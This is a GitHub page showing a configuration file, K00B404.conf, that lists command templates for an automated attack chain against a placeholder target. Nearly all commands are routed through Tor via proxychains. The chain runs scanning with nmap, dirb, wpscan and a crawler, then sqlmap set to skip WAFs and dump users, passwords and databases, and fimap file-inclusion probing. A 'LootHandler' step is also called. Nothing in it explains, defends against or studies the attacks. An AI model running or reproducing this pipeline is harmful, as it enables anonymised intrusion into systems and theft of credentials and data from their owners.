-
Notifications
You must be signed in to change notification settings - Fork 0
/
K00B404.conf
17 lines (17 loc) · 1.97 KB
/
K00B404.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
TYPE::COMMAND
MKDIR::service tor restart && mkdir -p output/_TARGET_
DIG::proxychains dig -4 _TARGET_ > output/_TARGET_/dig_output.lst && cat output/_TARGET_/dig_output.lst
GEOLOCATE::echo _TARGET_ > "output/_TARGET_/ip_geo.txt" && geoiplookup _TARGETIP_ >> "output/_TARGET_/ip_geo.txt" && cat "output/_TARGET_/ip_geo.txt"
SQLMAP::proxychains sqlmap -u "_TARGETFULL_" --dbms mysql --hex --output-dir "output/" --passwords --users --threads 10 --tables --dbs --skip-waf --random-agent --level 2 --risk 3 --batch --retries=1 --timeout 10 --smart --is-dba --dump
NMAP::proxychains nmap -F -n -Pn -vvv --open _TARGETIP_ > output/_TARGET_/nmap_output.lst && cat output/_TARGET_/nmap_output.lst
WPSCAN::wpscan --url "http://"_TARGET_ --batch
NMAP::proxychains nmap -n -Pn -vvv --open -p 81,8001,8081 _TARGETIP_ -sV > "output/_TARGET_/nmap_output.lst" |cat "output/_TARGET_/nmap_output.lst"
NMAP::proxychains nnmap -vv _TARGETIP_ | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} > "output/_TARGET_/nmap_ip_port_output.lst" && cat "output/_TARGET_/nmap_ip_port_output.lst"
SQLMAP::proxychains sqlmap -u "_TARGETFULL_" --dbms mysql --is-dba --users --passwords --skip-waf --random-agent --level 1 --risk 1 --batch --retries=1 --smart --output-dir="output/"
NMAP::proxychains nmap -n -Pn -vvv --open --top-ports 10 _TARGETIP_ -sV
FIMAP::proxychains fimap -u "http://_TARGET_" -4 -w "output/fimap__TARGET__found_urls.lst" -d 3 >> "output/_TARGET_/fimap_output.lst" && cat "output/_TARGET_/fimap_output.lst"
DIRB::proxychains dirb "http://"_TARGET_ |grep "200" > "output/_TARGET__dirb_output.lst" && cat "output/_TARGET__dirb_output.lst"
BLACKWIDOW::echo "BLACKWIDOW RUNNING" && proxychains blackwidow -l 1 -u "_TARGETFULL_" -d "_TARGET_" -s "output/_TARGET_/blackwidow_output.lst"
SPIDER::echo "SPIDER SCRIPT" && python "/root/stuff/tools/PWR_inurl/modules/crawly.py" --verbose --max-urls=10 --max-time 3 -d 4 "http://"_TARGET_
PORTTODB::bash Commands.sh _TARGET_
LOOTHANDLER::bash LootHandler.sh